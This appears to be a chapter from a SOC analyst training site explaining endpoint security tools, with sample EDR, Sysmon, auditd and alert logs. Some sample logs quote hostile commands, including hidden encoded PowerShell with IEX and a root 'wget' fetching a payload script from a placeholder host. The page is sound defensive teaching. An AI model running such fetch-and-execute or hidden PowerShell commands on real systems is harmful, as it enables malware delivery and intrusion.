Home > SOC Analysis

Endpoint Security Components

Endpoint security is one of the most important layers in a SOC because attackers often start their intrusion on endpoints. A SOC needs deep visibility into process execution, file activity, network behavior, memory usage, script execution, registry changes, and user actions. This chapter explains each endpoint security component with practical, real-world examples, logs, and how analysts use them.

Endpoint Detection and Response (EDR)

EDR is the primary tool for endpoint visibility. It runs as an agent on machines and monitors every significant activity.

What EDR Collects

  • Process creation

  • Command-line arguments

  • Parent/child process chains

  • PowerShell, cmd, bash commands

  • Network connections

  • File creation/modification

  • Registry changes

  • DLL loads

  • Memory injection behavior

Real EDR Example

Suspicious PowerShell spawned from Outlook:

Parent: OUTLOOK.EXE
Process: powershell.exe
Command: powershell -enc UwB5AHMAdABlAG0...
Network: 103.33.11.21:443

This indicates a phishing attachment dropping malware.

Analyst Usage

EDR lets analysts:

  • Kill processes

  • Isolate the endpoint

  • Retrieve forensic artifacts

  • Capture memory dumps

  • Block malicious hashes

EDR is the first line of detection and response for endpoint attacks.

Anti-Malware / Antivirus Engine

EDR usually includes anti-malware, but standalone AV still plays a role. It scans:

  • Files written to disk

  • Downloads

  • Executable content

  • Macros

  • Archives

Modern attackers often use fileless malware, so AV is no longer enough by itself.

Practical Example

Malicious file detected:

Detected: Trojan.GenericKD.403244
File Path: C:\Users\Mayur\AppData\Local\Temp\invoice.exe
Action: Quarantined

AV stops basic commodity threats before they execute.

Host-based Firewall

Each endpoint has a local firewall controlling inbound/outbound traffic.

Why It Matters

Attackers rely on outbound connections for:

  • Command-and-control

  • Data exfiltration

  • Downloading second-stage payloads

A host firewall can block unusual outbound traffic, such as PowerShell reaching suspicious IPs.

Practical Example

Blocked outbound connection:
Process: powershell.exe
Destination: 152.89.44.10:443
Reason: Not allowed by outbound rule

This prevents malware from contacting its server.

Application Whitelisting / Allowlisting

Application allowlisting only allows approved applications to run. Everything else is blocked.

Tools:

  • AppLocker (Windows)

  • WDAC (Windows Defender Application Control)

  • Carbon Black App Control

Practical Example

Unknown EXE blocked:

Blocked: C:\Users\Admin\Downloads\payload.exe
Reason: Not in allowed applications list

This stops malware even if the user tries to run it.

Script Control and Macro Protection

Attackers use scripts to bypass AV and run payloads in memory.

Critical script types:

  • PowerShell

  • WMI

  • VBScript

  • JavaScript

  • Office Macros

Protection includes:

  • PowerShell Constrained Language Mode

  • Macro blocking policies

  • AMSI integration

Example Detection

PowerShell running Base64-encoded command:

powershell.exe -enc JABjACA9ACcAaAB0AHQAcAA6AC8ALwBtAG8Aa...

This indicates script-based malware.

Endpoint Logging (Sysmon, Auditd, Windows Events)

Strong endpoint detections rely on detailed logging.

Sysmon (Windows)

Provides detailed telemetry beyond default Windows logs.

Important Sysmon events:

  • Event ID 1: Process creation

  • Event ID 3: Network connections

  • Event ID 7: Image loaded

  • Event ID 11: File create

  • Event ID 13: Registry change

  • Event ID 19–22: WMI events

Real Sysmon Example

ProcessCreate:
  Parent: winword.exe
  Process: powershell.exe
  CommandLine: powershell -nop -w hidden -c IEX(...)

This is a classic macro → PowerShell attack chain.

Auditd (Linux)

Linux equivalent collects:

  • Commands executed

  • File access

  • Privilege changes

  • User switching

Example:

type=USER_CMD msg=audit(1700733305): user=root cmd="wget http://malicious-ip/payload.sh"

Browser Protection

Browsers are major attack vectors.

Browser security tools monitor:

  • Malicious downloads

  • Phishing sites

  • Dangerous extensions

  • Drive-by exploit attempts

Practical example:

Blocked: Drive-by download attempt
URL: hxxp://badsite[.]xyz/dropper.js

This stops infection before payload delivery.

Email Security Integration (Client-side)

Endpoints must enforce email protections even if server filtering exists.

Endpoint email controls detect:

  • Malicious attachments

  • Macro-enabled documents

  • Scripted PDFs

  • Embedded payloads

  • Suspicious links

Practical example:

Attachment blocked: invoice.docm
Reason: Macro-enabled document from untrusted sender

Memory Protection (Exploit Mitigation)

Modern attackers often exploit memory to bypass disk-based controls.

Mechanisms include:

  • DEP (Data Execution Prevention)

  • ASLR (Address Space Layout Randomization)

  • ROP protection

  • Code injection detection

  • Behavior blocking

Practical detection:

Exploit blocked: ROP chain attempt detected in chrome.exe

This stops zero-day-like activity.

Device Control

Attackers use USB drives to introduce malware or steal data.

Device control allows the SOC to:

  • Block USB storage

  • Allow only approved devices

  • Monitor file transfers

  • Detect malicious drivers

Example alert:

USB Blocked:
Device: Kingston 64GB
Reason: Not in approved device list

Data Loss Prevention (DLP)

Endpoints often leak data unintentionally or maliciously.

DLP monitors:

  • Clipboard content

  • File uploads

  • Email attachments

  • USB copies

  • Cloud storage uploads

Example:

Blocked: Upload of customer_data.csv to dropbox.com

DLP stops insider threats and accidental leaks.

Endpoint Configuration Management

Attackers exploit misconfigurations. Secure configurations include:

  • Disabling unnecessary services

  • Enforcing strong password policies

  • Enabling full disk encryption

  • Enforcing least privilege

  • Ensuring patches are applied

Example: Patch alert

Host missing critical patch:
MS17-010 (EternalBlue)
Severity: Critical

SOC analysts use this to prevent ransomware.

Practical Endpoint Attack Example (Putting Everything Together)

  1. User opens malicious doc → email security logs

  2. Macro launches PowerShell → Sysmon Event 1

  3. PowerShell contacts internet → firewall + Sysmon Event 3

  4. Fileless payload loads into memory → EDR behavioral alert

  5. Attacker moves laterally → Windows Event 4624 + Sysmon logs

  6. DLP detects data copy attempt → DLP alert

  7. EDR isolates endpoint → containment

Each component catches a different phase of the attack.

Intel Dump

  • EDR provides deep visibility into processes, file actions, network connections, and memory activity.

  • AV blocks commodity malware before execution.

  • Host firewalls prevent malicious outbound connections.

  • Application allowlisting blocks unauthorized executables.

  • Script control protects against macro and PowerShell attacks.

  • Sysmon and Auditd provide detailed endpoint logs.

  • Browser protection blocks phishing and drive-by downloads.

  • Email security blocks malicious attachments and links.

  • Memory protection stops exploit attempts.

  • Device control restricts unauthorized USB usage.

  • DLP prevents sensitive data exfiltration.

  • Strong endpoint configuration reduces attack surface.

  • Combined endpoint components detect real-world attacker behavior at every stage.

HOME LEARN COMMUNITY DASHBOARD